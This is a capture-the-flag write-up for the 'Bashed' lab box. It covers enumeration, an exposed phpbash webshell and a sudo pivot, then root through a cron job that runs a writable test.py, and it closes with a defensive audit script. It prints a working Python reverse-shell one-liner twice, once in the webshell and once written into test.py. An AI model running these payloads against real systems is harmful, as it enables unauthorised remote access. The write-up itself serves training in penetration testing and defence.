# Bashed

## Nmap

```
sudo nmap 10.10.10.68 -p- -sS -sV

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
```

Over on port 80 the root page directs us to Arrexel's development site, which appears to be a blog. The first post mentions a webshell called phpbash.

![](/files/-M_CDPIQwr8rsN2Zsr-Y)

Following the post, we see further information about phpbash along with a GitHub link.

![http://10.10.10.68/single.html#](/files/-M_CDcxIfi7mTxBrogCf)

Running dirsearch.py against the web server with the big.txt wordlist from SecLists, we find the `/dev/` directory.

```
sudo python3 dirsearch.py -u http://10.10.10.68 -w /usr/share/seclists/Discovery/Web-Content/big.txt --full-url -t 75
```

![](/files/-M_CEDhm2XxNLUU7DVXX)

Browsing to the directory we see an index page containing the phpbash.php shell mentioned earlier.

![http://10.10.10.68/dev/](/files/-M_CEUKz9__XYo5eMVKe)

Clicking on phpbash.php takes us to the webshell.

![](/files/-M_CEikk9sRfdcsVk-zC)

Next, ideally we want a proper reverse shell. I checked whether python was installed with the `which python` command, and it was confirmed as present.

![](/files/-M_CFxHQ72JAa-WtNNf2)

I then set up a `netcat` listener on my attacking machine and executed the command below in the webshell.

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.29",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
```

![](/files/-M_CG654AK_pJPRZiPld)

From here checking `sudo -l` for `sudo` permissions shows that we can run all commands as the user 'scriptmanager' without providing a password.

![](/files/-M_CHGTJbJ_nF4Wy9oQG)

As such, running the command below spawns a bash shell as the user scriptmanager.

```
sudo -u scriptmanager /bin/bash
```

![](/files/-M_CHWaeZcw32r5g0kK8)

From here I noticed the non-default 'scripts' folder in '/'.

![](/files/-M_CJcmikgc3OINmDnjh)

It contains two files: test.py and test.txt.

![](/files/-M_CJjSFsOW4CQBIOplz)

Viewing the contents, it looks like test.py, when executed, creates a test.txt file and writes the string 'testing 123!' to it.

![](/files/-M_CJrU8QCTB3rURS2wK)

Provided this is executed with elevated privileges, we can insert a python reverse shell into test.py, since we are the owner of the file. To check whether these files are being executed by a cron job, I uploaded pspy64 to the target system.

After uploading the binary and setting the correct executable permissions I executed pspy64 and was presented with the following:

![](/files/-M_CKb5G7FNt5voaVlnb)

We see that a process runs at a regular interval and executes any file ending in .py in that directory. Because we are the owner of test.py, I will simply overwrite its contents with a python reverse shell.

```
echo > test.py
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.29",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")' > test.py
```

I then set up a listener on port 53 on my attacking machine and soon after caught a root shell.

![](/files/-M_CLnhasC1AVc2N79QD)
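The root cause here is a root cron job executing every .py file from a directory owned by a lower-privileged user. As an added defensive check (not part of the original writeup, and not a tool from the box), the script below audits such a directory and flags the directory itself and any .py file that a non-root user owns or can write to; `trusted_uids`, `demo()` and the constructed temp tree are assumptions made for the example.

```python
import os
import stat
import tempfile
from typing import List, Set


def classify_entry(path: str, uid: int, mode: int, trusted_uids: Set[int]) -> List[str]:
    """Return the reasons a cron-executed path could be modified by a
    lower-privileged user. Pure function: testable on constructed
    uid/mode values without needing root."""
    findings = []
    if uid not in trusted_uids:
        findings.append(f"{path}: owned by uid {uid}, which is not a trusted uid")
    if mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable")
    if mode & stat.S_IWGRP:
        findings.append(f"{path}: group-writable")
    return findings


def audit_cron_script_dir(directory: str, trusted_uids: Set[int] = frozenset({0})) -> List[str]:
    """Flag the directory (a writable directory lets anyone drop a new .py)
    and every *.py inside it that an untrusted user could change."""
    findings = []
    st = os.lstat(directory)
    findings += classify_entry(directory, st.st_uid, st.st_mode, trusted_uids)
    for name in sorted(os.listdir(directory)):
        full = os.path.join(directory, name)
        st = os.lstat(full)
        if stat.S_ISLNK(st.st_mode):
            findings.append(f"{full}: symlink (target may be user-controlled)")
        elif name.endswith(".py"):
            findings += classify_entry(full, st.st_uid, st.st_mode, trusted_uids)
    return findings


def demo() -> List[str]:
    """Build a constructed /scripts-like tree in a temp dir and audit it,
    treating only the current user as trusted so mode bits drive the result."""
    root = tempfile.mkdtemp()
    os.chmod(root, 0o755)
    safe, loose = os.path.join(root, "safe.py"), os.path.join(root, "test.py")
    for p in (safe, loose):
        with open(p, "w") as fh:
            fh.write("print('testing 123!')\n")
    os.chmod(safe, 0o644)
    os.chmod(loose, 0o666)  # constructed: writable by everyone
    return audit_cron_script_dir(root, trusted_uids={os.getuid()})


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Run against the real directory with the default `trusted_uids={0}`: on this box `/scripts` and `test.py` are owned by scriptmanager, so both would be reported.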
